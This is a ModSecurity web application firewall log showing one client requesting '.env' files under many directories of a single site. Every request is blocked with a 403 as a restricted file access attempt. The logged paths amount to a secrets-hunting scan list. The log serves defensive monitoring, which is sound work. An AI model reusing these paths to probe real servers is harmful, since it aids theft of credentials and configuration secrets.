[Mon May 11 16:41:45.716702 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcQAAAQo"]
[Mon May 11 16:41:45.717178 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcQAAAQo"]
[Mon May 11 16:41:45.717397 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcQAAAQo"]
[Mon May 11 16:41:45.895020 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcgAAAQo"]
[Mon May 11 16:41:45.895532 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcgAAAQo"]
[Mon May 11 16:41:45.895769 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agHqqUWKUxpmnkK7zHyCcgAAAQo"]
[Mon May 11 16:41:46.064886 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCcwAAAQo"]
[Mon May 11 16:41:46.065388 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCcwAAAQo"]
[Mon May 11 16:41:46.065608 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCcwAAAQo"]
[Mon May 11 16:41:46.240198 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdAAAAQo"]
[Mon May 11 16:41:46.240703 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdAAAAQo"]
[Mon May 11 16:41:46.240944 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdAAAAQo"]
[Mon May 11 16:41:46.408299 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdQAAAQo"]
[Mon May 11 16:41:46.408780 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdQAAAQo"]
[Mon May 11 16:41:46.409011 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agHqqkWKUxpmnkK7zHyCdQAAAQo"]
[Mon May 11 16:41:46.927076 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHqqlV4kyjgo4bQBUhagQAAAMg"]
[Mon May 11 16:41:46.927625 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHqqlV4kyjgo4bQBUhagQAAAMg"]
[Mon May 11 16:41:46.927947 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agHqqlV4kyjgo4bQBUhagQAAAMg"]
[Mon May 11 16:41:47.316456 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHqq1V4kyjgo4bQBUhaggAAAMg"]
[Mon May 11 16:41:47.316930 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHqq1V4kyjgo4bQBUhaggAAAMg"]
[Mon May 11 16:41:47.317151 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agHqq1V4kyjgo4bQBUhaggAAAMg"]
[Mon May 11 16:41:47.487025 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHqq1V4kyjgo4bQBUhagwAAAMg"]
[Mon May 11 16:41:47.487532 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHqq1V4kyjgo4bQBUhagwAAAMg"]
[Mon May 11 16:41:47.487751 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agHqq1V4kyjgo4bQBUhagwAAAMg"]
[Mon May 11 16:41:47.649250 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahAAAAMg"]
[Mon May 11 16:41:47.649746 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahAAAAMg"]
[Mon May 11 16:41:47.650001 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahAAAAMg"]
[Mon May 11 16:41:47.826173 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahQAAAMg"]
[Mon May 11 16:41:47.826652 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahQAAAMg"]
[Mon May 11 16:41:47.826912 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahQAAAMg"]
[Mon May 11 16:41:48.000680 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahgAAAMg"]
[Mon May 11 16:41:48.001201 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahgAAAMg"]
[Mon May 11 16:41:48.001450 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHqq1V4kyjgo4bQBUhahgAAAMg"]
[Mon May 11 16:41:48.166342 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiAAAAMg"]
[Mon May 11 16:41:48.166832 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiAAAAMg"]
[Mon May 11 16:41:48.167080 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiAAAAMg"]
[Mon May 11 16:41:48.596328 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiQAAAMg"]
[Mon May 11 16:41:48.596841 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiQAAAMg"]
[Mon May 11 16:41:48.597110 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaiQAAAMg"]
